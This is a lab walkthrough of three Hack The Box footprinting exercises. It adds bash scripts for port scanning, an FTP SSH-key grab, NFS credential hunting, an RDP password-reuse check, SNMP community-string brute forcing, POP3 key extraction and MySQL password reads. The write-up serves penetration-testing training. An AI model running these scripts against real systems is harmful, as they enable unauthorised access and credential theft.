CPTS #02: Footprinting

Read these hints and try to solve the labs yourself before reading the write-up.

Easy lab: the service you need is on a port outside the 1000 ports Nmap scans by default.

Medium lab: Try logging in as another user.

Hard lab: run a UDP scan; Nmap's default scan covers TCP only.

The Easy Lab

– An Nmap scan of the target revealed several open ports, including FTP. FTP is frequently misconfigured (anonymous logins, reused credentials, readable home directories), so it is worth checking this service first.

– We were given the credentials of the user ‘ceil’, so let's try them against FTP. The login succeeds, but the directory listing contains nothing useful.

– Next, DNS enumeration. The banner shows that the company's domain is inlanefreight.htb, so we query the target's DNS server for more information. A zone transfer (AXFR) attempt returns nothing useful, however.

– When I checked back on the full-port Nmap scan still running in the background, it had found another open port: 2121. A non-standard port is exactly what the hint points at, and 2121 is commonly a second FTP instance, so I tried the ‘ceil’ credentials against it.

– The login succeeded, and the listing contained some interesting directories, including .ssh. I downloaded the private key from it (the id_rsa file by default; authorized_keys only holds public keys and is of no use for logging in), set its permissions to 600 so the SSH client accepts it, and used it to log in without a password.

– Now we just need to locate and read flag.txt somewhere on this server.
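The whole Easy lab chain as one script: full TCP range scan, service scan on what is open, the AXFR attempt, FTP listings on every FTP-like port rather than just 21, then the key fetch and SSH login. This is an added example written for this page, not code from the original write-up. The target IP (passed as the first argument), the password for ceil (read from FTP_PASS), the key path .ssh/id_rsa relative to the FTP login directory, and the Nmap grepable sample used to exercise the parsers offline are all assumptions or constructed data.

```shell
#!/usr/bin/env bash
# Added example for the Easy lab; this is not code from the original write-up.
# Hypothetical inputs: target IP as $1, the password for "ceil" in FTP_PASS, and the
# private key sitting at .ssh/id_rsa under the FTP login directory of the 2121 server.
set -eu

# Open TCP ports from Nmap grepable (-oG) output on stdin, printed as "21,22,2121".
open_ports_from_grepable() {
    grep -o '[0-9]*/open/tcp' | cut -d/ -f1 | sort -un | paste -sd, -
}

# Open TCP ports whose nmap-services name contains "ftp" (21/ftp, 2121/ccproxy-ftp, ...).
# Matching the service field instead of hard-coding 21 is what surfaces the second FTP server.
ftp_like_ports() {
    grep -o '[0-9]*/open/tcp//[^/]*ftp[^/]*/' | cut -d/ -f1 | sort -un
}

# Constructed sample of -oG output (not a real scan) so the parsers can be run offline.
SAMPLE_GREPABLE='# Nmap 7.94 scan initiated (constructed sample)
Host: 10.129.1.2 ()  Status: Up
Host: 10.129.1.2 ()  Ports: 21/open/tcp//ftp///, 22/open/tcp//ssh///, 53/open/tcp//domain///, 2121/open/tcp//ccproxy-ftp///  Ignored State: closed (65531)
# Nmap done (constructed sample)'

# All 65535 TCP ports; the default top-1000 scan never touches 2121.
full_port_scan() {        # $1 = target
    nmap -p- --min-rate 5000 -oG - "$1"
}

# Version/script scan restricted to the ports that are actually open.
service_scan() {          # $1 = target, $2 = comma-separated ports
    nmap -sC -sV -p "$2" "$1"
}

# Zone transfer attempt against the target's own DNS server.
try_zone_transfer() {     # $1 = target, $2 = domain
    dig axfr "$2" "@$1"
}

# Directory listing over FTP with curl; works the same for 21 and 2121.
ftp_list() {              # $1 = target, $2 = port, $3 = user, $4 = password
    curl -s --user "$3:$4" "ftp://$1:$2/"
}

# Pull the private key (not authorized_keys, which only holds public keys), fix its mode
# so ssh accepts it, then log in and locate the flag.
ftp_key_to_ssh() {        # $1 = target, $2 = port, $3 = user, $4 = password
    curl -s --user "$3:$4" "ftp://$1:$2/.ssh/id_rsa" -o id_rsa
    chmod 600 id_rsa
    ssh -i id_rsa "$3@$1" 'find / -name flag.txt -exec cat {} \; 2>/dev/null'
}

# Only touches the network when a target is given; the parsers above run offline.
if [ -n "${1:-}" ]; then
    target=$1
    scan=$(full_port_scan "$target")
    ports=$(printf '%s\n' "$scan" | open_ports_from_grepable)
    service_scan "$target" "$ports"
    try_zone_transfer "$target" inlanefreight.htb
    for p in $(printf '%s\n' "$scan" | ftp_like_ports); do
        echo "== FTP listing on port $p =="
        ftp_list "$target" "$p" ceil "${FTP_PASS:?set FTP_PASS}"
    done
    ftp_key_to_ssh "$target" 2121 ceil "$FTP_PASS"
fi
```

Run it as `FTP_PASS='...' ./easy.sh <target>`. The -p- scan is what the hint is about: a default `nmap <target>` would have reported only 21, 22 and 53 and the lab would look like a dead end.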

The Medium Lab

– An Nmap scan found ports for services such as RDP, NFS and SMB.

– Since SMB is available, I tried enumerating shares with smbclient, but it yielded nothing. I then used showmount to list the NFS exports and found a shared directory.

– After mounting the export, we found many text files inside. One of them contains information about a specific user.

– We have the login credentials for the user Alex.

– Use this information to log in to the server via RDP.

– After logging in, we noticed that SQL Server Management Studio is installed, which suggests an MSSQL instance is running locally. Logging in to it with Alex's credentials failed, however.

– The error message indicates that Alex's account is not permitted to log in to the instance. Looking around, I found a directory in Alex's user folder containing a file with credentials for the sa user, the built-in MSSQL sysadmin account.

– However, even with the sa user credentials, we still couldn’t log in to the database.

– I was stuck here for a long time trying to work out the login, convinced it was a problem with the service itself (a poor assumption in hindsight). After a few hours I looked for hints in the forum, where members suggested logging in as a different, more privileged user. That pointed me at password reuse: I tried the sa password against the Administrator account.

– Login succeeded! Now open SQL Server Management Studio from the Administrator session and connect with Windows Authentication; the Administrator's Windows login is accepted by the instance, so no SQL password is needed. From there, a few queries against the user table retrieve the HTB user's password.
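The Medium lab as a script: parse the NFS export list, mount it read-only, grep the share for credential-looking lines, and then the lesson of the lab, trying one recovered password against several accounts over RDP before falling back to Windows Authentication in MSSQL. This is an added example for this page, not the author's commands. The mount point, the account names alex and Administrator, the SA_PASS variable, the column name `username`, and the sample share contents are assumptions or constructed data; the reading of xfreerdp's exit status under +auth-only as "credentials accepted" is also an assumption.

```shell
#!/usr/bin/env bash
# Added example for the Medium lab; this is not code from the original write-up.
# Hypothetical: target as $1, mount point under /mnt/nfs, account names alex and
# Administrator, and a users table whose database/table names come from enumeration.
set -eu

# showmount -e prints "Export list for <host>:" then one "<path> <clients>" line per export.
export_paths() {
    awk 'NR > 1 && NF > 0 { print $1 }'
}

# Mount read-only; nolock sidesteps a hang on rpc.statd when the server only offers NFSv3.
mount_export() {          # $1 = target, $2 = export path, $3 = mount point
    sudo mkdir -p "$3"
    sudo mount -t nfs -o ro,nolock "$1:$2" "$3"
}

# Credential-looking lines in text files ("Username: ...", "password = ...").
# Exits 0 even with no hits so it behaves under set -e.
hunt_credentials() {      # $1 = directory
    grep -rniE --include='*.txt' -e 'pass(word|wd)?[[:space:]]*[:=]' -e 'user(name)?[[:space:]]*[:=]' "$1" || true
}

# Constructed test data standing in for the share; none of it is lab content.
SAMPLE_SHOWMOUNT='Export list for 10.129.1.3:
/shared  (everyone)
/backup  10.10.0.0/16'

make_sample_share() {     # $1 = directory to populate
    mkdir -p "$1/old"
    printf 'Meeting notes\nNothing here.\n' > "$1/notes.txt"
    printf 'Account for new hire\nUsername: alex\nPassword: Example-Pass-1\n' > "$1/old/onboarding.txt"
    printf 'password: ignored, wrong extension\n' > "$1/readme.md"
}

# Interactive RDP; lab hosts present self-signed certificates, hence /cert:ignore.
rdp_session() {           # $1 = target, $2 = user, $3 = password
    xfreerdp /v:"$1" /u:"$2" /p:"$3" /cert:ignore /dynamic-resolution
}

# One recovered password, tried against other accounts. +auth-only makes xfreerdp
# authenticate and disconnect; a zero exit status is taken to mean the credentials were
# accepted (assumption about xfreerdp's exit codes; confirm interactively on a hit).
check_password_reuse() {  # $1 = target, $2 = password, rest = user names
    target=$1; password=$2; shift 2
    for user in "$@"; do
        if xfreerdp /v:"$target" /u:"$user" /p:"$password" /cert:ignore +auth-only >/dev/null 2>&1; then
            echo "VALID   $user"
        else
            echo "invalid $user"
        fi
    done
}

# To run inside the Administrator RDP session: sqlcmd -E is Windows Authentication, the same
# option chosen in SSMS in the write-up. Database and table names are enumerated, not guessed.
mssql_windows_auth() {    # $1 = database, $2 = T-SQL
    sqlcmd -S localhost -E -d "$1" -Q "$2"
}
mssql_enum_then_read() {  # $1 = database, $2 = table (learned from the first two queries)
    mssql_windows_auth master "SELECT name FROM sys.databases;"
    mssql_windows_auth "$1" "SELECT TABLE_SCHEMA, TABLE_NAME FROM INFORMATION_SCHEMA.TABLES;"
    mssql_windows_auth "$1" "SELECT * FROM $2 WHERE username = 'HTB';"   # column name assumed
}

if [ -n "${1:-}" ]; then
    target=$1
    showmount -e "$target" | export_paths | while read -r export; do
        mount_export "$target" "$export" "/mnt/nfs$export"
        hunt_credentials "/mnt/nfs$export"
        sudo umount "/mnt/nfs$export"
    done
    check_password_reuse "$target" "${SA_PASS:?set SA_PASS}" alex Administrator
fi
```

The first half runs from the attacking machine; `mssql_enum_then_read` is meant to be run (or retyped) inside the Administrator RDP session, where sqlcmd inherits the Windows logon that the instance trusts.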

The Hard Lab

– An Nmap scan found open ports for IMAP, POP3 and SSH.

– In this lab we have no credentials for IMAP or POP3, so we need to find some. I spent around two hours waiting on a scan of the remaining ports, but Nmap still had not finished, and HTB offers no hints here.

– After that I started a UDP scan, which also took a long time, so I looked for hints in the HTB forum and found a suggestion to look at SNMP. Scanning UDP port 161 specifically showed that it was open.

– I used snmpwalk with common community strings such as public and private, but neither worked. So I brute-forced the community string with onesixtyone and a wordlist, found the correct one, and ran snmpwalk again with it.

– Once snmpwalk finishes, the output contains information related to credentials.
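The SNMP step as a script: probe UDP 161 instead of waiting on a full UDP sweep, brute-force the community string with onesixtyone, walk the tree, and filter the walk for STRING values that look like credentials. This is an added example for this page, not the author's commands. The target argument, the SecLists wordlist path, and the onesixtyone/snmpwalk sample output used to exercise the parsers offline are assumptions or constructed data; the credential-looking command line in the sample is invented, not lab content.

```shell
#!/usr/bin/env bash
# Added example for the SNMP step of the Hard lab; this is not code from the original write-up.
# Hypothetical: target as $1; the SecLists wordlist path is an assumption about your install.
set -eu

WORDLIST=${SNMP_WORDLIST:-/usr/share/seclists/Discovery/SNMP/snmp.txt}

# Probe UDP 161 only; a full -sU sweep takes hours, which is what stalled the write-up.
snmp_probe() {            # $1 = target
    sudo nmap -sU -sV -p 161 "$1"
}

# onesixtyone prints "<ip> [<community>] <sysDescr>" for every accepted string.
communities_from_onesixtyone() {
    sed -n 's/^[^[]*\[\([^]]*\)\].*/\1/p'
}

find_community() {        # $1 = target
    onesixtyone -c "$WORDLIST" "$1" | communities_from_onesixtyone | head -n 1
}

# Walk with v2c, fall back to v1 (onesixtyone only speaks v1, so a hit there does not prove v2c).
snmp_dump() {             # $1 = target, $2 = community, $3 = output file
    snmpwalk -v2c -c "$2" "$1" > "$3" 2>&1 || snmpwalk -v1 -c "$2" "$1" > "$3" 2>&1
}

# Keep only STRING values, unquoted, that mention something credential-like.
# hrSWRunParameters (1.3.6.1.2.1.25.4.2.1.5.<pid>) is the usual source: the full command
# lines of running processes, including any --user/--pass style arguments.
interesting_strings() {   # stdin = snmpwalk output
    grep 'STRING:' | sed 's/^.* = STRING: //; s/^"//; s/"$//' \
        | grep -iE 'pass|pwd|user|login|cred|key|secret' || true
}

# Constructed sample output (not from the lab) to exercise the parsers offline.
SAMPLE_161='10.129.1.4 [monitoring] Linux target 5.4.0-generic x86_64'
SAMPLE_WALK='iso.3.6.1.2.1.1.1.0 = STRING: "Linux target 5.4.0-generic x86_64"
iso.3.6.1.2.1.1.4.0 = STRING: "it-support@example.htb"
iso.3.6.1.2.1.1.5.0 = STRING: "target"
iso.3.6.1.2.1.25.4.2.1.4.612 = STRING: "/usr/bin/python3"
iso.3.6.1.2.1.25.4.2.1.5.612 = STRING: "/opt/mail-sync.py --user svc_backup --pass ExamplePass123"
iso.3.6.1.2.1.25.4.2.1.5.700 = STRING: "-c /etc/backup.conf"
iso.3.6.1.2.1.25.1.7.1.2.1.3.4.105.110.102.111 = STRING: "Login to IMAP with the backup account"'

if [ -n "${1:-}" ]; then
    target=$1
    snmp_probe "$target"
    community=$(find_community "$target")
    [ -n "$community" ] || { echo "no community string found in $WORDLIST" >&2; exit 1; }
    snmp_dump "$target" "$community" snmpwalk.txt
    interesting_strings < snmpwalk.txt
fi
```

Keep the full snmpwalk.txt; the keyword filter is a first pass, and things like hostnames, contact addresses and script paths in the rest of the walk are what tell you which service to try the credentials against.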

– The first service I tried the credentials against was POP3 on port 110. The login succeeded, and one of the emails contained a key. I suspected it was an SSH private key, so I copied it to my machine and used it to log in via SSH.

– Logged in successfully! Now, let’s look around for anything that might reveal the password of the HTB user.

– I read some emails and checked the Maildir directory, but found nothing interesting.

– So I listed hidden files and checked the Bash history. It showed that this machine runs MySQL and that the current user can log in to it. The MySQL history then revealed a users database. Let's log in to MySQL and query its table for the HTB user's password.

– From here, a SELECT against the users table retrieves the password.
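The rest of the Hard lab chain as a script: a raw POP3 session, cutting the private key block cleanly out of the mail, SSH with the right key permissions, and on the box the two hidden history files, including decoding the octal escapes the mysql client writes into ~/.mysql_history, followed by MySQL table enumeration instead of guessing a table name. This is an added example for this page, not the author's commands. The target argument, the MAIL_USER/MAIL_PASS variables, the `username` column, and the sample mail (with placeholder lines where key material would be) are assumptions or constructed data.

```shell
#!/usr/bin/env bash
# Added example for the POP3 -> SSH -> MySQL chain of the Hard lab; not code from the original write-up.
# Hypothetical: target as $1, the SNMP-recovered credentials in MAIL_USER/MAIL_PASS, and a users
# database whose table name is enumerated rather than assumed.
set -eu

# Plain-text POP3 over nc: authenticate, list, pull message 1, quit.
pop3_fetch_first() {      # $1 = target, $2 = user, $3 = password
    printf 'USER %s\r\nPASS %s\r\nLIST\r\nRETR 1\r\nQUIT\r\n' "$2" "$3" | nc -w 5 "$1" 110
}

# Cut a private key block out of a mail body (stdin). Strips POP3's CRLF first; anything outside
# the BEGIN/END lines (headers, signature, the "." terminator) would corrupt the key file.
extract_private_key() {
    tr -d '\r' | sed -n '/^-----BEGIN [A-Z ]*PRIVATE KEY-----$/,/^-----END [A-Z ]*PRIVATE KEY-----$/p'
}

ssh_with_key() {          # $1 = target, $2 = user, $3 = key file
    chmod 600 "$3"        # ssh refuses keys that are group- or world-readable
    ssh -i "$3" "$2@$1"
}

# On the box. Both histories are dotfiles, which is why a plain ls misses them.
# The mysql client stores spaces (and other special bytes) as \ooo octal escapes in
# ~/.mysql_history, so "show\040databases;" is what you actually see; printf %b decodes it.
decode_mysql_history() {  # stdin = ~/.mysql_history
    while IFS= read -r line || [ -n "$line" ]; do
        printf '%b\n' "$line"
    done
}

show_histories() {
    echo "== bash history ==";  cat ~/.bash_history 2>/dev/null || true
    echo "== mysql history =="; decode_mysql_history < ~/.mysql_history 2>/dev/null || true
}

# Enumerate the tables of the users database, then read the HTB row. -p with no value prompts.
mysql_enum_tables() {     # $1 = mysql user, $2 = database
    mysql -u "$1" -p -e "SELECT table_name FROM information_schema.tables WHERE table_schema = '$2';"
}
mysql_read_user() {       # $1 = mysql user, $2 = database, $3 = table, $4 = username to look up
    mysql -u "$1" -p -D "$2" -e "SELECT * FROM $3 WHERE username = '$4';"   # column name assumed
}

# Constructed sample of a POP3 RETR response carrying a key; the key lines are placeholders.
sample_mail() {
    printf '%s\r\n' '+OK 812 octets' 'From: it@example.htb' 'Subject: your key' '' \
        'Here is the key you asked for:' \
        '-----BEGIN OPENSSH PRIVATE KEY-----' \
        'CONSTRUCTED-PLACEHOLDER-NOT-A-REAL-KEY-LINE-1' \
        'CONSTRUCTED-PLACEHOLDER-NOT-A-REAL-KEY-LINE-2' \
        '-----END OPENSSH PRIVATE KEY-----' \
        'Regards' '.'
}

if [ -n "${1:-}" ]; then
    target=$1
    pop3_fetch_first "$target" "${MAIL_USER:?set MAIL_USER}" "${MAIL_PASS:?set MAIL_PASS}" \
        | extract_private_key > id_rsa
    ssh_with_key "$target" "$MAIL_USER" id_rsa
fi
```

Once on the box, `show_histories`, then `mysql_enum_tables <user> users` and `mysql_read_user <user> users <table> HTB` reproduce the last three bullets; if the RETR output is larger than one message, pick the right message number from the LIST response before extracting.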